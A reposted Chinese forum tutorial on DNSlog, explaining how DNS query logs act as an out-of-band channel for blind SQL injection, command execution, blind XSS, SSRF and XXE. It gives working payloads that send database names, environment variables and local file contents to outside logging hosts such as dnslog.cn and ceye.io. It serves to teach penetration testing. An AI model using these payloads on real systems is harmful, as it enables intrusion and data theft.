• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    深入理解DNSlog

    发布者: 娅水9213 | 发布时间: 2025-8-16 02:26| 查看数: 54| 评论数: 0|帖子模式

    0x00 DNSlog 介绍
    1. 首先我们知道DNS是起ip与域名的解析的服务,通过ip可以解析到对应的域名。DNSlog就是储存在DNS上的域名相关的信息,它记录着你对域名或者IP的访问信息,也就是类似于日志文件,
    复制代码
    0x01 DNSlog回显原理
    1. 首先了解一下多级域名的概念,我们知道因特网采用树状结构命名方法,按组织结构划分域是一个名字空间中一个被管理的划分,域可划分为子域,子域再可被划分为多级域名称为一级域名,二级域名,三级域名,从一个域名地址来从右到左依次是顶级域名,二级域名,三级域名,例如 gaobai.kxsy.com,通俗的说就是我有个域名kxsy.work,我将域名设置对应的ip 2.2.2.2 上,这样当我向dns服务器发起kxsy.work的解析请求时,DNSlog中会记录下他给kxsy.work解析,解析值为2.2.2.2,而我们这个解析的记录的值就是我们要利用的地方,这个过程被记录下来就是DNSlog,
    复制代码
    0x02 DNSlog 应用

    1.sql布尔盲注、时间盲注,注入的效率低且线程高容易被waf拦截,又或者是目标站点没有回显可利用NDSlog
    2.无回显的命令执行
    推荐三个大众化的免费dns解析记录网站
    1. http://www.dnslog.cnhttp://admin.dnslog.linkhttp://ceye.io
    复制代码
    0x03 DNSlog回显注入条件

    1.数据库root权限,
    2.数据库可读写权限,secure_file_priv值为空,上期笔记有说明,
    3.windows系统,

    0x04 DNSlog -sql注入

    1.注册一个dns解析服务,利用唯一标识符,以无回显sql注入为例

    2.注入测试 需要闭合语句 替换标识符 利用盲注回显
    1. ?id=1' and if((select load_file(concat('\\\\',(select database()),'.tlyypi.dnslog.cn\\abc'))),1,0)--+
    复制代码

    在回显数据时,域名能够接受的字符是有条件限制的,某些不适合作为域名的特殊字符可能会被屏蔽掉,针对这种情况我们也可以base64编码后再进行请求。

    0x05 DNSlog 其他应用

    1.xss盲打
    1. "<script src=http://XSS.XXXXX.ceye.io></script>"
    复制代码
    2.SSRF
    1. "... <!ENTITY test SYSTEM "SSRF.xxxx.ceye.io\\aa"> ..."
    复制代码
    3.命令执行
    1. " ping %PATH%.pxxx.ceye.io ..."
    复制代码
    4.XXE
    XXE漏洞可以解析外部实体,就可以拿来读取本地服务器文件,这时,我们只需把dtd文件改成这样
    1. <!ENTITY % all
    2. "<!ENTITY &#x25; send SYSTEM 'http://XXXX.ceye.io/%file;'>"
    3. >
    4. %all;
    复制代码
    到此这篇关于深入理解DNSlog 的文章就介绍到这了,更多相关DNSlog内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!

    来源:互联网
    免责声明:如果侵犯了您的权益,请联系站长(1277306191@qq.com),我们会及时删除侵权内容,谢谢合作!

    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有账号?立即注册

    ×

    最新评论

    浏览过的版块

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表